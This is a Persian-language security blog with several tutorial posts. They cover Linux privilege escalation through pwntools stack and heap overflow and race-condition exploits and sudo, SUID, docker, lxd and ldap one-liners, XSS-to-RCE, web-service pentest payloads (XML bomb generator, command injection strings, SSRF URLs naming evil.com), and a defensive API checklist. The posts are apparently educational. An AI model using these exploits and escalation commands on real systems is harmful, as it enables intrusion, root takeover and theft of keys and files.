نوشته های rezaduty

ارتقا دسترسی در لینوکس - قسمت ۲

rezaduty — Tue, 21 Jul 2020 18:20:52 +0430

در قسمت قبل برخی از روش های ارتقا دسترسی در لینوکس را بررسی کردیم در این قسمت می خواهیم روش های ارتقا دسترسی از طریق اکسپلویت برنامه ها را بررسی کنیم.قبل از شروع این قسمت لازم به گفتن هست برای تسلط به ارتقا دسترسی از طریق کرنل و کتابخانه ها دانش مهندسی معکوس، سیستم عامل و اکسپلویت نویسی نیاز است.این پست شامل ویژگی های امنیتی سیستم عامل ها و کامپایلر ها نیست و به صورت مستقیم و خیلی خیلی ساده و مبتدی برخی آسیب پذیری ها را بررسی می کنیم.همچنین برای آشنایی با روش های بیشتر میتوانید از مطالب دوره sec660 و sec760 استفاده کنید.جزوه بسیار خلاصه دوره sec660 را از اینجا و دوره sec760 را از اینجا میتوانید پیدا کنید.آسیب پذیری سرریز پشته یا Stack Overflowفرض کنید برنامه ای متغیری دارد و برنامه نویس اندازه متغیر را به صورت ثابت تعریف کرده است.اگر ما بتوانیم مقدار زیاد تر از اندازه سایز متغیر به برنامه پاس بدهیم می توانیم کنترل برنامه را در اختیار و از دسترسی برنامه برای ارتقا دسترسی استفاده کنیم.برای مهندسی معکوس و مشاهده سورس کد فایل های اجرایی از ida استفاده می کنیم.کد زیر را در نظر بگیرید.int vulnerable() { char s; // [sp+4h] [bp-14h]@1 gets(&s); return puts(&s); }متغیر s از رجیستر ebp تا اندازه مشخص شده 0x14 است.همچنین در آدرس های مشخص شده در ida آدرس 0804843B مربوط به retaddr است. .text:0804843B success proc near .text:0804843B push ebp .text:0804843C mov ebp, esp .text:0804843E sub esp, 8 .text:08048441 sub esp, 0Ch .text:08048444 push offset s ; "You Hava already controlled it." .text:08048449 call _puts .text:0804844E add esp, 10h .text:08048451 nop .text:08048452 leave .text:08048453 retn .text:08048453 success endpبنابراین پیلود ما باید شامل اندازه retaddr یا sucess_addr به اضافه اندازه ثبات ebp به اضافه اندازه متغیر تعریف شده باشد که در اینصورت پیلود حمله ما به این صورت خواهد بود.0x14*'a'+'bbbb'+success_addrبرای اکسپلویت از کتابخانه pwntools استفاده می کنیم.در اکسپلویت ابتدا آدرس ابتدایی برنامه را که با success_addr مشخص شده است چاپ می کنیم و سپس پیلود خود را که به اندازه success_addr، اندازه ثبات ebp و همچنین اندازه متغیر تعریف شده است، به برنامه تزریق می کنیم.##coding=utf8 from pwn import * sh = process('./stack_example') success_addr = 0x0804843b payload = 'a' * 0x14 + 'bbbb' + p32(success_addr) print p32(success_addr) sh.sendline(payload) sh.interactive()آسیب پذیری سرریز Heap یا Heap Overflowدر برنامه هایی که تخصیص حافظه پویا دارند و از heap استفاده می کنند ممکن است عدم مدیریت حافظه و کنترل ورودی منجر به آسیب پذیری heap overflow شود.به زبان دیگر اگر تعداد بایت های نوشته شده در یک بلاک یا heap block بیش تر از اندازه تعیین شده باشد ممکن است heap overflow رخ دهد و مهاجم بتواند باعث سرریز داده و دسترسی به آدرس فیزیکی بلاک بعدی شود.برای شناسایی heap overflow باید:ابتدا برنامه از heap استفاده کند.دوم اندازه داده های نوشته شده به درستی کنترل نشده باشد.چند نمونه از توابعی که عدم کنترل ورودی می تواند باعث این آسیب پذیری شود عبارتنند از:ورودی هاentergetsscanfvscanfخروجی هاsprintfتوابع کار با رشته هاstrcpystrcatbcopyبرای مثال به کد زیر دقت کنید.int my_gets(char *ptr,int size) { int i; for(i=0;i<=size;i++) { ptr[i]=getchar(); } return i; } int main() { void *chunk1,*chunk2; chunk1=malloc(16); chunk2=malloc(16); puts("Get Input:"); my_gets(chunk1,16); return 0; } در برنامه بالا شرط بررسی حلقه به درستی کنترل نشده است بدین منظور میتوانیم با اجرای چندباره برنامه بتوانیم به بلاک بعدی برویم.برای اینکار ابتدا برنامه را با debugger هایی مانند gdb اجرا می کنیم.0x602000: 0x0000000000000000 0x0000000000000021 <=== chunk1 0x602010: 0x0000000000000000 0x0000000000000000 0x602020: 0x0000000000000000 0x0000000000000021 <=== chunk2 0x602030: 0x0000000000000000 0x0000000000000000سپس مقدار 'A'*17 به برنامه پاس می دهیم.0x602000: 0x0000000000000000 0x0000000000000021 <=== chunk1 0x602010: 0x4141414141414141 0x4141414141414141 0x602020: 0x0000000000000041 0x0000000000000021 <=== chunk2 0x602030: 0x0000000000000000 0x0000000000000000توضیحات بیشتر درباره این آسیب پذیریآسیب پذیری race conditionفرض کنید برنامه ای وجود دارد که نام فایل را از کاربر گرفته و در صورتی که نام آن مخالف flag باشد محتویات آن را چاپ می کند.حال اگر بتوانیم از این شرط گذر کنیم می توانیم محتویات فایل flag را چاپ کنیم.به واسطه آسیب پذیری race condition می توانیم درخواست چاپ محتویات فایل را به تعداد بالا و در زمان مشخص به برنامه ارسال کنیم و برنامه به واسط این همزمانی برای دسترسی به شی به اشتراک گذاشته شده درخواست اول را بررسی و به درخواست دوم اجازه دسترسی می دهد.برای مثال در برنامه زیر ابتدا نام فایل به عنوان پارامتر از کاربر گرفته می شود سپس بررسی می شود که نام فایل flag نباشد.#include #include #include #include #include #include void showflag() { system("cat flag"); } void vuln(char *file, char *buf) { int number; int index = 0; int fd = open(file, O_RDONLY); if (fd == -1) { perror("open file failed!!"); return; } while (1) { number = read(fd, buf + index, 128); if (number <= 0) { break; } index += number; } buf[index + 1] = '\x00'; } void check(char *file) { struct stat tmp; if (strcmp(file, "flag") == 0) { puts("file can not be flag!!"); exit(0); } stat(file, &tmp); if (tmp.st_size > 255) { puts("file size is too large!!"); exit(0); } } int main(int argc, char *argv[argc]) { char buf[256]; if (argc == 2) { check(argv[1]); vuln(argv[1], buf); } else { puts("Usage ./prog "); } return 0; }بعد از بررسی محتویات فایل خوانده و در استک نوشته می شود.همانطور که از کد مشخص است اندازه ورودی کنترل نشده است و آسیب پذیری stack overflow محرز است و کافی است آدرس تابع main را تغییر دهیم.from pwn import * test = ELF('./test') payload = 'a' * 0x100 + 'b' * 8 + p64(test.symbols['showflag']) open('big', 'w').write(payload)همچنین برای اکسپلویت آسیب پذیری race condition باید ابتدا اسکریپتی داشته باشیم که به تعداد بالا فایل را تولید کند.فایل exp.sh#!/bin/sh for i in `seq 500` do cp small fake sleep 0.000008 rm fake ln -s big fake rm fake doneسپس اسکریپت دیگر فایل ها را به برنامه پاس دهد.فایل run.sh#!/bin/sh for i in `seq 1000` do ./test fake doneبرای اجرا هم ابتدا اسکریپت ساخت فایل را اجرا و سپس فایل را به عنوان پارامتر به برنامه هدف پاس می دهیم.(sh exp.sh &) && sh run.shاز دیگر آسیب پذیری های دیگر می توان به موارد زیر اشاره نمود.Bypassing Stack CanariesFormat StringReturn-oriented ProgrammingJump-oriented Programming* Heap *Integer overflowمنابع و توضیحات بیشترhttps://tc.gts3.org/cs6265/2019/tut/index.htmlhttps://ctf-wiki.github.io/ctf-wiki/pwn/linux/race-condition/problem-zh/https://github.com/TechSecCTF/pwn_challshttps://github.com/shellphish/how2heaphttps://heap-exploitation.dhavalkapil.com/attacks/double_free.htmlhttp://exploit-exercises.lains.space/

روش های ارتقاء دسترسی در لینوکس - قسمت ۱

rezaduty — Mon, 06 Jul 2020 18:48:42 +0430

یکی از مهم ترین کارها بعد از نفوذ به سرور و در اختیار گرفتن دسترسی کاربر عادی، ارتقاء دسترسی و یا مجوز دسترسی به اطلاعات سایر کاربران است.ما در لینوکس روش های مختلف و خلاقانه ای داریم که در چند پست قسمت خیلی کوچکی از این روش ها را بررسی می کنیم.در این آموزش ها ما سه روش تغییر دسترسی در لینوکس را بررسی می کنیم.در روش اول به صورت کلی برای تغییر دسترسی ما تلاش می کنیم فایلی را که دارای مجوز مشخص است را پیدا(A) و فایل های دیگر را که با فایل دارای مجوز درارتباط هستند را به نحوی تغییر دهیم(B) که در هنگام اجرا توسط فایل دارای مجوز دسترسی ما ارتقا پیدا کند.A(B)از نمونه های این روش می توان استفاده از sudoer و suid و docker اشاره نمود.در روش دوم با استفاده از مفاهیم سیستم عامل و کتابخانه های مورد استفاده برنامه های سعی می کنیم دسترسی خود را تغییر دهیم.از نمونه های این روش می توان به استفاده از rope و heap و stack اشاره نمود.در روش سوم هم با استفاده از قابلیت های کرنل و برنامه های مرتبط با آن و آسیب پذیری های شناخته شده آن سعی می کنیم دسترسی خود را ارتقا ببخشیم.از نمونه های این روش هم می توان به آسیب پذیری sudo با کد CVE-2019-14287 و یا آسیب پذیری در systemctl با کد CVE-2018-19788 اشاره نمود.تعیین نادرست sudoerهمانطور که می دانیم کاربرانی که حق اجرای دستور sudo دارند sudoer نامیده و حق اجرای موارد مشخص شده در فایل /etc/sudoers را با دسترسی مدیر سیستم دارند.برای بررسی این فایل می توانیم از دستور sudo -l استفاده کنیم.برای مثال فرض کنید حق اجرای python در فایل sudoers به صورت زیر برای کاربر demo در نظر گرفته شده است.demo All=(ALL) NOPASSWD: /usr/bin/pythonخب مشخصا کاربر demo می تواند به این شکل در python دسترسی خود را به root ارتقاء و دستورات را با دسترسی root اجرا کنید.python -c 'import os;os.system("id")'نمونه ای دیگر در زبان java به این شکل خواهد بود.در صورت اجرا فایل jjs در مسیر /usr/lib/jvm/java-11-openjdk-amd64/bin/Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc $@|sh${IFS}-p _ echo sh -p /dev/pts/0 2>/dev/pts/0').waitFor()در مثالی دیگر فرض کنید ویرایشگر های vim و nano قابلیت اجرا تحت sudo را دارند.برای ارتقاء دسترسی در vim به شکل زیر عمل می کنیم.:set shell=/bin/sh:shellهمچنین برای ارتقاء دسترسی در nano هم به شکل زیر عمل می کنیم.^R^Xreset; sh 1>&0 2>&0تعیین نادرست SUIDدر لینوکس ما قابلیت تنظیم مجوز برای فایلی مشخص را برای اجرای تحت کاربر خاص داریم.این تنظیم مجوز با suid انجام می شود.برای مثال اگر suid فایلی ۴۰۰۰ باشد ما می توانیم به واسطه آن فایل دسترسی خود را تغییر دهیم.برای پیدا نمودن فایل های با مجوز ۴۰۰۰ از دستور زیر استفاده می کنیم.find / -uid 0 -perm -4000 -type f 2>/dev/nullبعد از پیدا نمودن فایل دارای مجوز، فایل اجرایی را توسط کاربر اجرا و از مجوز های آن به نحو احسنت استفاده می کنم.برای مثال فرض کنید journalctl دارای suid است.کافی است است بعد از اجرا، شل را فراخوانی کنیم.!/bin/shدر روش دیگر فایلی وجود دارد که سیستمی است ولی قابل نوشتن یا writable است.برای پیدا نمودن فایل های writable از دستور زیر استفاده می کنیم.find / -writable ! -user whoami -type f ! -path “/proc/” ! -path “/sys/” -exec ls -al {} \; 2>/dev/nullحال فرض کنید فایل header-00 قابلیت نوشتن دارد.فایل 00-header هنگام ورود با ssh اجرا و banner مشخص شده را نمایش می دهدبرای مثال برای خوش آمد گوشیی که کاربر می تواند مورد استفاده قرار بگیرد.این فایل به صورت پیش فرض تحت root اجرا و برای کاربران قابل شخصی سازی است. برای ارتقاء دسترسی توسط این فایل می توانیم passwd را بخوانیم.echo "cat /root/root.txt" >> 00-headerبنابر این بعد از ورود به سیستم توسط کاربر در اختیار گرفته شده فایل محتوای 00-header چاپ و فایل passwd خوانده می شود.افزایش دسترسی در dockerاگر سرویس docker توسط کاربر بدون احراز هویت قابل اجرا و یا کاربر عضو گروه docker و توانایی راه اندازی سرویس را داشته باشد ما می توانیم container را از root در mnt به صورت زیر اصطلاح mount کنیم.docker run -v /root:/mnt -it ubuntuهمچنین می توانیم از دستور زیر هم استفاده کنیم.docker run --rm -it --privileged nginx bash mkdir /mnt/fsroot mount /dev/sda /mnt/fsrootافزایش دسترسی با lxdابتدا با استفاده از دستورات زیر نسخه از lxd به اصطلاح build می کنیم.git clone https://github.com/saghul/lxd-alpine-builder.git ./build-alpineسپس در سیستم هدف image را دریافت و سپس دستورات زیر را به ترتیب اجرا می کنیم.import ./alpine-v3.12-x86_64-20200621_2005.tar.gz --alias attackerlxc init attacker tester -c security.privileged=truelxc exec tester/bin/shافزایش دسترسی با ldap ابتدا باید ssh را با استفاده از ldap فعال کنیم برای اینکار ابتدا دستور زیر را اجراldapmodify -x -w PASSWORDسپس محتوای زیر را با توجه به مشخصات سرور در آن قرار دهید.dn: cn=openssh-lpk,cn=schema,cn=config objectClass: olcSchemaConfig cn: openssh-lpk olcAttributeTypes: ( 1.3.6.1.4.1.24552.500.1.1.1.13 NAME 'sshPublicKey' DESC 'MANDATORY: OpenSSH Public key' EQUALITY octetStringMatch SYNTAX 1.3.6.1.4.1.1466.115.121.1.40 ) olcObjectClasses: ( 1.3.6.1.4.1.24552.500.1.1.2.0 NAME 'ldapPublicKey' SUP top AUXILIARY DESC 'MANDATORY: OpenSSH LPK objectclass' MAY ( sshPublicKey $ uid ) )بعد از فعال سازی ssh حال برای ارتقا دسترسی دستور زیر را اجراldapmodify -x -w PASSWORDو سپس محتوای زیر را با توجه به مشخصات کاربر و گروه کاربر هدف و کلید id_rsa خود، تغییر و قرار می دهیم.dn: uid=UID,ou=users,ou=linux,ou=servers,dc=DC,dc=DC changeType: modify add: objectClass objectClass: ldapPublicKey - add: sshPublicKey sshPublicKey: content of id_rsa.pub - replace: EVIL GROUP ID uidNumber: CURRENT USER ID - replace: EVIL USER ID gidNumber: CURRENT GROUP ID

از xss به rce

rezaduty — Wed, 01 Jul 2020 20:13:17 +0430

the-scientist.comهمانطور که می دانیم آسیب پذیری xss در سمت کاربر یا client رخ می دهد بنابر این هر اسکریپت یا دستور که تزریق می شود در سمت کاربر و به ازای هر کاربر اجرا می شود؛با این توضیحات فرض کنید سامانه ای وجود دارد که می توان در بخش export آن گزارشات مختلف را به صورت pdf دریافت نمود.درخواست export، شامل عنوان فایل خروجی و قابل تغییر است ؛ به این صورت که می توان عنوان فایل را از title=History به title=Test تغییر داد.این تغییر به شکل testبرای امکان ارتقاء آسیب پذیری xss ابتدا در فایل script.js موقعیت اجرا اسکریپت را بررسی می کنیم.برای این کار می توانیم از به شکل زیر استفاده می کنیم.اگر خروجی location مانند تصویر به شکل :file بودمی توانیم با استفاده از XMLHttpRequest به سمت سرور فایلی را بخوانیم و در فایل export گرفته شده در سمت کاربر نمایش بدهیم.درخواست های XMLHttpRequest قابلیت ارسال درخواست سمت سرور را با استفاده از جاوااسکریپت به ما می دهند.برای نمایش id_rsa سمت سرور از کد زیر در script.js استفاده می کنیم.کد بالا هنگام اجرا درخواستی به مسیر /home/reader ارسال و فایل id_rsa فرخوانی و به صورت base64 encode نمایش می دهد.حالا درخواست export را با پارامتر

چک لیست امنیت وبسرویس ها

rezaduty — Tue, 09 Jun 2020 15:23:58 +0430

در سری آموزش های تست نفوذ وبسرویس برخی از حملات را به صورت خلاصه بررسی کردیم.در این قسمت می خواهیم راهکار های جلوگیری و همچنین راهنماهای تست وبسرویس ها را معرفی کنیم.در این مخزن گیت هاب چک لیست امنیت وبسرویس ها به زبان انگلیسی قرار داده شده است که نسخه فارسی آن را می توانید در قسمت زیر مشاهده فرمایید.احراز هویت(Authentication)هیچگاه از Basic Auth استفاده نکنید. از روش های استاندارد کنید (برای مثال از JWT و یا OAuth استفاده کنید).سعی در ایجاد روش های جدید و ساخت دوباره چرخ در Authentication, token generation, password storage نکنید.از Max Retry و قابلیت قفل شدن اکانت استفاده کنید .از رمز نگاری برای رمز کردن تمام اطلاعات مهم و حساس استفاده کنید.استفاده از JWT (JSON Web Token)از کلید های پیچیده در (JWT Secret) استفاده کنید تا حدس زدن آن ها دشوار تر باشد.در هیچ صورت از الگوریتم های رمز نگاری در فرانت اند استفاده نکنید. باید از الگوریتم های (HS256 یا RS256) در بک اند استفاده کنید.برای توکن با استفاده از (TTL, RTTL) مدت زمان کوتاه اعتبار تعریف کنید.اطلاعات مهم را داخل JWT نگهداری نکنید, چون می توان به راحتی آن را رمز گشایی کرد.استفاده از OAuthبرای redirect_uri در بک اند white list مسیر های مجاز را تعریف کنید.برای ارتباط بخش های مختلف از کد به جای تو کن استفاده کنید (از response_type=token استفاده نکنید).از پارامتر state با مقدار تصادفی برای جلوگیری از حملات CSRF استفاده کنید.مقدار پیش فرضی برای scope تعریف کنید, و مقدار scope را برای هر application جداگانه تعریف کنید.کنترل دسترسی(Access)محدودیت درخواست برای جلوگیری از حملات DDOS یا تکذیب سرور\حملات brute force یا حدس زدن تعریف کنید.از پروتکل HTTPS برای جلوگیری از حملات MITM(Man-in-the-middle) یا مرد میانی تعریف کنید.از HSTS در هدر درخواست ها به همراه SSL برای جلوگیری از حملات SSL Strip استفاده کنید.کنترل ورودی یا Inputبرای هر عملیات از متد متناسب در درخواست استفاده کنید: GET (خواندن), POST (ایجاد), PUT/PATCH (جایگذاری/بروزرسانی), و DELETE (برای حذف رکورد), و برای متد های نا متناسب از پاسخ 405 Method Not Allowed استفاده کنید.مقدار content-type را بررسی و اعتبار سنجی کنید (برای مثال از application/xml, application/json استفاده کنید) و هرچه به غیر مقادیر مجاز را با 406 Not Acceptable پاسخ دهید.همچنین برای content-type در متد post از مقادیر (application/x-www-form-urlencoded, multipart/form-data, application/json و ...) استفاده کنید.ورودی های سمت کاربر را برای جلوگیری از حملات متداول (مانند XSS, SQL-Injection, Remote Code Executionو ...) کنترل کنید.اطلاعات مهم مانند (credentials, Passwords, security tokens, یا API keys) در URL انتقال ندهید و به جای آن از هدر های استاندارد در درخواست استفاده کنید.از درگاه برای API برای cache و قوانین rate limit استفاده کنید (برای مثال Quota, Spike Arrest, یا Concurrent Rate Limit) و همچنین منابع مورد نیاز را به صورت پویا بارگذاری کنید.پردازش(Processing)تمام نقاظ یا endpoint هایی که برای دسترسی به آن نیاز به احراز هویت است را بررسی کنید.برای دریافت ID موجودیت ها از این شکل /me/orders به جای این شکل /user/654321/orders استفاده کنید.از حالت auto-increment برای ID ها استفاده نکنید. از UUID استفاده کنید.از فایل های xml استفاده می کنید, کدهای دریافت و parse نمودن xml را برای جلوگیری از حملات XXE (XML external entity attack) کنترل کنید.اگر از فایل های xml استفاده می کنید, کدهای دریافت و parse نمودن xml را برای جلوگیری از حملات XXE (XML external entity attack) کنترل کنید..از CDN های برای بارگذاری فایل ها استفاده کنید.اگر با داده های بسیار زیادی سر و کار دارید, از Workers و Queues برای پردازش استفاده کنید تا پاسخ به درخواست ها سریع تر باشد.فراموش نکنید حالت DEBUG را غیر فعال کنید.خروجی(Output)پارامتر و مقدار X-Content-Type-Options: nosniff در هدر پاسخ ارسال کنید.پارامتر و مقدار X-Frame-Options: deny در هدر پاسخ ارسال کنید.پارامتر و مقدار Content-Security-Policy: default-src 'none' در هدر پاسخ ارسال کنید.اطلاعاتی که باعث شناسایی سیستم مورد استفاده می شود را حذف کنید مانند: X-Powered-By, Server, X-AspNet-Version.مقدار content-type در پاسخ را حتما تعیین کنید, اگر نوع خروجی application/json است پس نوع پاسخ یا content-type هم باید application/json باشد.اطلاعات مهم مانند credentials, Passwords, یا security tokens در پاسخ ارسال نکنید.کد وضیعت پاسخ ارسال شده را تعیین کنید. (مانند 200 OK, 400 Bad Request, 401 Unauthorized, 405 Method Not Allowed.).یکپارچه سازی و تحویل مستمر(CI & CD)بررسی و ممیزی امنیتی برای تست های unit/integration .استفاده از code review در روند توسعه جدا از بررسی کد توسط شخص توسعه دهنده.تمام اجزای مورد استفاده به صورت مستقیم و غیر مستقیم مانند کتابخانه ها و دیگر وابستگی های پروژه قبل از استفاده در محیط production باید با استفاده از AV تست شوند.طراحی راه حل هایی برای rollback در محیط توسعه در نظر گرفته شود.می توانید فایل اکسل این چک لیست به زبان انگلیسی و فارسی از این جا دریافت کنید.برای تست امنیتی خودکار وبسرویس می توانید از SoapUI و WSSAT استفاده کنید.همچنین برای راهنمای تست تفوذ هم می توانید از این مخزن و این فایل استفاده کنید.

آسیب پذیری های CORS,SOME,JWT,IDOR در وبسرویس ها

rezaduty — Mon, 08 Jun 2020 10:41:50 +0430

در قسمت آخر سری آموزش های تصویری تست نفوذ وبسرویس ها این قسمت با یک سری دیگر از آسیب پذیری های رایج در وبسرویس مثل CORS و SOME و JWT و IDOR آشنا می شویم.آسیب پذیری هایی که این این قسمت می خواهیم درباره آن صحبت کنیم بسیار مرسوم است.برای تست CORS می توانید از روش های زیر هم استفاده نمایید.۱-وبسایت test-cors.org۲-اسکریپت زیر#@merwan curl -I -X OPTIONS \ -H "Origin: ${MY_URL}" \ -H 'Access-Control-Request-Method: GET' \ "${MY_URL}/SOMETHING" 2>&1 | grep -i 'Access-Control-Allow-Origin'۳-اسکنر corsypython3 corsy.py -i /path/urls.txtبرای تست و اکسپلویت SOME ۱-وبسایت someattack۲-کد زیر برای اکسپلویت function some() { open("http://soap.vul/dvws/vulnerabilities/some/token_generator.php?&mycallback=window.opener.alert(1);<\/script>¶m1=retrievetoken¶m2=dvwsuser¶m3=some&_=1591253461719"); setTimeout('location="http://soap.vul/dvws/vulnerabilities/some/"') } استفاده شد.برای تست jwt۱-وبسایت jwt.io۲-ابزار c-jwt-cracker و crackjwt و jwt-cracker برای کرک./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjEیاcrackjwt.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE dictionary.txtیاjwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6همچنین برای تست idor و access control ها می توانیم ابتدا کلیه پارامتر هارا با Paramspider و یا ابزار های enumeration کلیه پارامتر ها و endpoint ها شناسایی و به ترتیب درجه اهمیت، idor را تست نماییم.python3 paramspider.py --domain soap.vulابزار دیگر برای تست خودکار HUNT است که می توانید با نصب آن در burp از آن استفاده کنید.در این قسمت تا اسلاید ۲۳ پیش رفتیم.اگر مشکلی در دسترسی به فیلم داشتید می توانید از dideo استفاده کنید.پیشاپیش از کم و کاستی ها این آموزش عذرخواهی می کنم.امید است با نظرات شما روز به روز به کیفیت آموزش ها افزوده شود.

آسیب پذیری های xml bomb,command injection, xst, ssrf در وبسرویس ها

rezaduty — Sun, 07 Jun 2020 12:22:21 +0430

از سری آموزش های تصویری تست نفوذ وبسرویس، این قسمت با یک سری دیگر از آسیب پذیری های رایج در وبسرویس مثل xml bomb و command injection و xst و ssrf آشنا می شویمآسیب پذیری هایی که این این قسمت می خواهیم درباره آن صحبت کنیم بسیار گسترده اند بنابراین بخشی از آموزش را در این جا به صورت متنی قرار می دهم.نمونه payload برای تست xml bomb1) ]> Now include &long; lots of times to expand the in-memory size of this XML structure &long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; Keep it going... &long;&long;&long;&long;&long;&long;&long;... 2) ]> Explode in 3...2...1...&boom; نمونه کد آسیب پذیر xml bomb:XmlReaderSettings settings = new XmlReaderSettings(); settings.DtdProcessing = DtdProcessing.Parse; settings.ValidationType = ValidationType.None; settings.MaxCharactersFromEntities = 999999999999999; XmlReader reader = XmlReader.Create(new StringReader(xml), settings); while (reader.Read()) { } return string.Empty;برای generate نمودن payload برای آسیب پذیری xml bomb میتوانید از این اسکریپت استفاده کنید.#!/usr/bin/python3 NUM = 55000 def main(): entity = 'A' * NUM refs = '&x;' * NUM templ = ''' ]> {entityReferences} '''.format(entity=entity, entityReferences=refs) print(templ) if __name__ == '__main__': main()برای آسیب پذیری command injection میتوانید از payload های زیر استفاده کنید.در لینوکس;id; ;id |id |/usr/bin/id |id|در ویندوز| dir ; dir %26%26 dir %26%26dirادامه payload هابرای تست آسیب پذیری XST می توانید به جای استفاده از اسکریپت که در فیلم گفته شد می توانید از ترمینال این دستور اجرا کنید.curl -X TRACE -H "Cookie: name=value" 127.0.0.1اگر مقدار تنظیم شده برای name در cookie پاسخ درخواست مشاهده شد آسیب پذیری xst وجود دارد.برای تست SSRF و اکسپلویت نمودن آن راه های زیاد و خلاقانه ای وجود دارد.در فیلم توانستیم با SSRF به صورت خیلی ساده port scan انجام بدهیم.یکی دیگه از راه های تست و اکسپلویت استفاده از دیگر پروتکل ها به جای http است.مثال های دیگر عبارتنند از:file://path/to/file sftp://evil.com:11111/ tftp://evil.com:12346/TESTUDPPACKET ldap://localhost:11211/%0astats%0aquit gopher://127.0.0.1:4242/DATA dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/htmlهمچنین برای تست ssrf می توانید از قابلیت burp collaborator در نرم افزار burp و همچنین ssrfmap استفاده کنیددر این قسمت تا اسلاید ۱۷ پیش رفتیم.اگر مشکلی در دسترسی به فیلم داشتید می توانید از dideo استفاده کنید.پیشاپیش از کم و کاستی ها این آموزش عذرخواهی می کنم.امید است با نظرات شما روز به روز به کیفیت آموزش ها افزوده شود.

آسیب پذیری های xxe,xpath injection,api sql injection در وبسرویس ها

rezaduty — Sun, 22 Mar 2020 12:57:01 +0430

از سری آموزش های تصویری تست نفوذ وبسرویس، این قسمت با یک سری از آسیب پذیری های رایج در وبسرویس مثل xxe و xpath injection و api sql injection آشنا می شویمهمچنین با ابزار های جمع آوری اطلاعات که در قسمت پیش با آن ها آشنا شده بودیم سعی می کنیم فایل wsdl پیدا کنیم.لیست ابزار هایی که این قسمت با آن به صورت مختصر کار می کنیم عبارتنند از:burpwfuzzwizdlerدر این قسمت تا اسلاید ۱۳ پیش رفتیم.اگر مشکلی در دسترسی به فیلم داشتید می توانید از dideo استفاده کنید.پیشاپیش از کم و کاستی ها این آموزش عذرخواهی می کنم.امید است با نظرات شما روز به روز به کیفیت آموزش ها افزوده شود.

مقدمه ای بر تست نفوذ وبسرویس

rezaduty — Wed, 04 Mar 2020 12:10:22 +0330

از سری آموزش های تصویری تست نفوذ وبسرویس، این قسمت با مفهوم وبسرویس و api و انواع وبسرویس آشنا می شویم.همچنین با یک سری از ابزار های جمع آوری اطلاعات و ابزار های کار تست انواع وبسرویس آشنا می شویم.لیست ابزار هایی که این قسمت با آن به صورت مختصر کار می کنیم عبارتنند از:opendoorwfuzzpostmansoapuiwizdlerburpدر این قسمت تا اسلاید 10 پیش رفتیماگر مشکلی در دسترسی به فیلم داشتید می توانید از dideo استفاده کنید.پی نوشتقسمت ۲ - آسیب پذیری های xxe,xpath injection,api sql injection در وبسرویس هاقسمت ۳ - آسیب پذیری های xml bomb,command injection, xst, ssrf در وبسرویس هاقسمت ۴ - آسیب پذیری های CORS,SOME,JWT,IDOR در وبسرویس هاپیشاپیش از کم و کاستی ها این آموزش عذرخواهی می کنم.امید است با نظرات شما روز به روز به کیفیت آموزش ها افزوده شود.

چگونه از Command Injection جلوگیری کنیم؟

rezaduty — Wed, 06 Nov 2019 21:51:54 +0330

از سری مطالب آموزش کد نویسی امن در وب، این قسمت آسیب پذیری command injection و روش های جلوگیری از آن را بررسی می کنیم.بعضی اوقات از دستورات سیستم عامل به صورت مستقیم و یا غیر مستقیم در بستر وب استفاده می شود.اگر ورود های دستورات سیستم عامل به صورت صحیح و کامل بررسی نشود ممکن است مهاجم با ورودی های متفاوت دستورات مورد نظر خود را اجرا کند.این آسیب پذیری بسیار گسترده و خطرناک است چون امکان دسترسی به کلیه منابع سرور اپلیکیشن و یا حتی سایر سرور ها را فراهم می کند.portswigger.net در تصویر بالا مهاجم با استفاده از آسیب پذیری command injection توانسته است اسکریپت bash را سمت سرور اجرا و دسترسی به سرور اپلیکشین بگیرد./** * Get the code from a GET input * Example - http://example.com/?code=phpinfo(); */ $code = $_GET['code']; /** * Unsafely evaluate the code * Example - phpinfo(); */ eval("\$code;");برای مثال در برنامه زیر ورودی دستور eval بدون هیچ بررسی از کاربر توسط پارامتر code گرفته می شود.http://example.com/?code=phpinfo();یا http://example.com/?code=system('whoami');حال اگر مهاجم دستورات زبان و یا سیستم عامل را وارد کند می گوییم command injection رخ داده است.روش های جلوگیری در زبان PHPمثال 1)تکه کد زیر آدرس کاربر را دریافت و به دستور ping می دهد. Command Injection می توانیم در ورودی علاوه بر آدرس با استفاده از جداکننده هایی مانند ; و یا && دستورات دیگر مورد نظر خود را وارد و اجرا کنیم.مثال 2)در نمونه دیگر خروجی دستور به صورت مستقیم به کاربر نشان داده نمی شود. Command Injection در این مورد می توانیم با استفاده از دستور های ایجاد کننده تاخییر مانند sleep آسیب پذیری را شناسایی کنیم.راه حل 1)در زبان php می توانیم با استفاده از تابع escapeshellcmd از ورود دستورات دیگر جلوگیری می کنیم. Command Injection راه حل 2)روش دیگر جلوگیری، تعریف نوع ورودی کاربر است.به این صورت که اگر مانند مثال بالا کاربر باید ip خود را وارد اپلیکیشن کند.ما باید نوع ورودی کاربر را بررسی و در صورت صحیح بودن آن را به تابع مورد نظر پاس دهیم.روش های جلوگیری در ASP.NETمثال 1)در برنامه زیر ورودی دستور ping از کاربر گرفته می شود. و نتیجه به کاربر نشان داده می شود.<%@ Page Language="C#" Debug="true" Trace="false" %> <%@ Import Namespace="System.Diagnostics" %> <%@ Import Namespace="System.IO" %>